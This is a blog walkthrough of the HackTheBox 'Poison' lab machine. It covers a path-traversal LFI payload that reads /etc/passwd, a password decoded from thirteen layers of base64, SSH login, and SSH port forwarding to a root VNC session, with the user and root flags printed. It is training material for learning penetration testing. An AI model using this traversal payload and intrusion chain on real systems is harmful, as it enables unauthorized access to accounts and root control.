HTB Poison Walkthrough - A Deep Dive into FreeBSD Exploitation
HackTheBox - Poison: Complete Walkthrough
Introduction
Poison represents an excellent medium-difficulty FreeBSD machine on HackTheBox that provides valuable lessons in web vulnerabilities, password cracking, and privilege escalation through local port forwarding. What makes this box particularly interesting is its departure from the typical Linux-based machines, giving us an opportunity to explore FreeBSD’s unique characteristics and security challenges.
In this comprehensive walkthrough, I’ll guide you through the entire process of compromising the Poison box, explaining each step in detail with a focus on understanding the underlying concepts and techniques. Unlike other write-ups, we’ll dig deeper into why certain approaches work and explore alternative methods where applicable.
Skills Practiced
- Local File Inclusion (LFI) exploitation
- Base64 decoding and password cracking
- FreeBSD system enumeration
- VNC session hijacking
- SSH port forwarding techniques
- Privilege escalation via running processes
Initial Reconnaissance
Let’s begin by gathering information about our target. First, we’ll run a comprehensive Nmap scan to identify open ports and running services:
1
2
3
4
5
# Initial scan
nmap -sC -sV -oA nmap/poison 10.10.10.84
# Full port scan (background)
nmap -p- -oA nmap/poison-allports 10.10.10.84 &
Here are the results from our initial scan:
1
2
3
4
5
6
7
8
9
10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Key observations:
- The target is running FreeBSD (not Linux)
- SSH service is available on port 22
- Web server running Apache 2.4.29 with PHP 5.6.32 on port 80
Let’s start by exploring the web server, as it often represents the largest attack surface.
Web Exploitation
Exploring the Web Interface
Navigating to http://10.10.10.84 in a browser reveals a simple PHP script listing:
The interface allows us to select and run PHP scripts from a dropdown list. This is immediately interesting as it suggests we might be able to view or execute files on the server. Such functionality often leads to Local File Inclusion (LFI) vulnerabilities.
Discovering Local File Inclusion (LFI)
Looking at the URL when selecting a script (http://10.10.10.84/browse.php?file=listfiles.php), I notice the file parameter. This is a classic entry point for LFI attacks. Let’s test this by trying to read a system file:
1
http://10.10.10.84/browse.php?file=../../../etc/passwd
Success! The server responds with the contents of /etc/passwd:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
This confirms the LFI vulnerability. I’ve also identified a user account named charix that will likely be important later.
Exploring Available Files
Let’s examine the files in the web directory:
1
http://10.10.10.84/browse.php?file=listfiles.php
Output:
1
2
3
4
5
6
7
8
9
10
11
12
Array
(
[0] => .
[1] => ..
[2] => browse.php
[3] => index.php
[4] => info.php
[5] => ini.php
[6] => listfiles.php
[7] => phpinfo.php
[8] => pwdbackup.txt
)
The pwdbackup.txt file looks interesting. Let’s check its contents:
1
http://10.10.10.84/browse.php?file=pwdbackup.txt
This reveals a multi-layered base64-encoded password:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
This password is secure, it's encoded at least 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZia3BQ
VmpOT00xcFhlRk5YUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
This requires multiple rounds of base64 decoding. Let’s write a short script to handle this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env python3
import base64
with open('encoded.txt', 'r') as f:
data = f.read().strip()
# Extract only the base64 content
lines = data.split('\n')
encoded = ''.join(lines[2:]) # Skip the first two lines
# Decode 13 times
for i in range(13):
encoded = base64.b64decode(encoded).decode('utf-8')
print(f"Iteration {i+1}: {encoded}")
print(f"\nFinal password: {encoded}")
Running this script gives us:
1
Final password: Charix!2#4%6&8(0
Great! We now have what appears to be the password for the user charix.
Gaining Initial Access
Let’s try to SSH into the machine using the credentials we found:
1
2
ssh [email protected]
# Enter password: Charix!2#4%6&8(0
Success! We’re now logged in as the user charix. Let’s explore the system and gather more information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Check the system information
uname -a
# FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
# Check user's home directory
ls -la
# total 28
# drwxr-x--- 2 charix charix 512 Mar 19 2018 .
# drwxr-xr-x 3 root wheel 512 Mar 19 2018 ..
# -rw-r----- 1 charix charix 166 Mar 19 2018 .cshrc
# -rw-r----- 1 charix charix 254 Mar 19 2018 .login
# -rw-r----- 1 charix charix 163 Mar 19 2018 .login_conf
# -rw-r----- 1 charix charix 379 Mar 19 2018 .mail_aliases
# -rw-r----- 1 charix charix 336 Mar 19 2018 .mailrc
# -rw-r----- 1 charix charix 802 Mar 19 2018 .profile
# -rw-r----- 1 charix charix 0 Mar 19 2018 .rhosts
# -rw-r----- 1 charix charix 980 Mar 19 2018 .shrc
# -rw-r----- 1 charix charix 33 Mar 19 2018 user.txt
# -rw------- 1 charix charix 1.0K Mar 19 2018 secret.zip
# Get the user flag
cat user.txt
# eaacdfb2d141b72a589233063604209c
We’ve found the user flag and an interesting file called secret.zip. Let’s download this file to our local machine for further analysis:
1
2
# On our attacking machine
scp [email protected]:/home/charix/secret.zip .
Let’s try to unzip it:
1
2
3
unzip secret.zip
# Archive: secret.zip
# [secret.zip] secret password:
It’s password-protected. Let’s try the same password we used for SSH:
1
2
3
4
unzip secret.zip
# Archive: secret.zip
# [secret.zip] secret password: Charix!2#4%6&8(0
# extracting: secret
Great! Let’s examine the extracted file:
1
2
3
4
5
6
file secret
# secret: Non-ISO extended-ASCII text, with no line terminators
xxd secret
# 00000000: 48c7 7c52 5958 3bc4 2aa4 0e3a 2f04 4b0e H.|RYX;.*..:/K.
# 00000010: 7a2f 44cd 85a9 1c5c b414 z/D....\..
This appears to be a binary file rather than text. Let’s keep it for later as it might be useful for privilege escalation.
Privilege Escalation
Enumerating Running Processes
Let’s check for running processes that might lead to privilege escalation:
1
ps aux
Interesting output from the process list:
1
root 529 0.0 0.9 23620 9032 v0- I 22:55 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
We can see that a VNC server is running as root on port 5901, but it’s only accessible from localhost (-localhost flag). This is a potential avenue for privilege escalation.
Port Forwarding to Access VNC
Since the VNC server is only accessible from localhost, we’ll need to use SSH port forwarding to access it:
1
2
# On our attacking machine
ssh -L 5901:127.0.0.1:5901 [email protected]
This command forwards our local port 5901 to port 5901 on the remote server, allowing us to connect to the VNC server as if we were on the localhost of the target machine.
Connecting to VNC Server
Now we need to determine how to authenticate to the VNC server. Remember the secret file we extracted earlier? Let’s try to use it as the VNC password file:
1
vncviewer -passwd secret 127.0.0.1:5901
Success! We’re now connected to a graphical desktop session running as root. We can open a terminal and access the root flag:
1
2
cat /root/root.txt
# 716d04b188419cf2bb99d891272361f5
Alternate Privilege Escalation Method
If the VNC approach doesn’t work or if you want to try a different method, we can also look for SUID binaries or other privilege escalation vectors:
1
find / -perm -u=s -type f 2>/dev/null
In FreeBSD, unlike Linux, SUID binaries are less commonly exploitable. However, we can explore kernel vulnerabilities or misconfigurations specific to FreeBSD.
Summary and Key Takeaways
- Initial Access:
- Discovered an LFI vulnerability in the PHP web application
- Found an encoded password in
pwdbackup.txt - Decoded the password through 13 layers of base64 encoding
- Used the credentials to SSH into the system as user
charix
- Privilege Escalation:
- Found a password-protected
secret.zipfile in the user’s home directory - Extracted a binary file that turned out to be a VNC password file
- Discovered a VNC server running as root but only accessible from localhost
- Used SSH port forwarding to access the VNC server
- Connected to the VNC server using the extracted password file
- Gained root access and captured the flag
- Found a password-protected
FreeBSD vs Linux: Important Differences
Working with FreeBSD in this challenge highlighted several key differences from Linux:
- Directory Structure: FreeBSD uses a slightly different directory structure compared to Linux.
- Package Management: FreeBSD uses
pkginstead ofaptoryum. - Shell: The default shell in FreeBSD is
cshrather thanbash. - Process Listing: The output format of
psis slightly different. - Default Utilities: Some common Linux utilities have different flags or behavior in FreeBSD.
Learning Resources
For those interested in deepening their understanding of the techniques used in this box, here are some valuable resources:
- Local File Inclusion (LFI):
- FreeBSD Security:
- VNC Security:
- SSH Port Forwarding:
Conclusion
Poison was an excellent medium-difficulty box that challenged us to exploit a web vulnerability, decode encoded credentials, and leverage port forwarding to access restricted services. The use of FreeBSD instead of Linux added an interesting twist, requiring us to adapt our usual techniques.
The most important lesson from this box is the danger of running privileged services that are only protected by network-level restrictions (localhost binding) rather than strong authentication mechanisms. Even though the VNC server was configured to only accept connections from localhost, we were able to bypass this restriction through SSH port forwarding.
This box also demonstrates the importance of proper password management. The user’s password was stored in an encoded format that provided a false sense of security, and the same password was reused for multiple purposes (SSH and zip file encryption).
I hope this walkthrough has been helpful and educational. Happy hacking!
Done!
Hi there 👋 Support me!
Life is an echo—what you send out comes back.
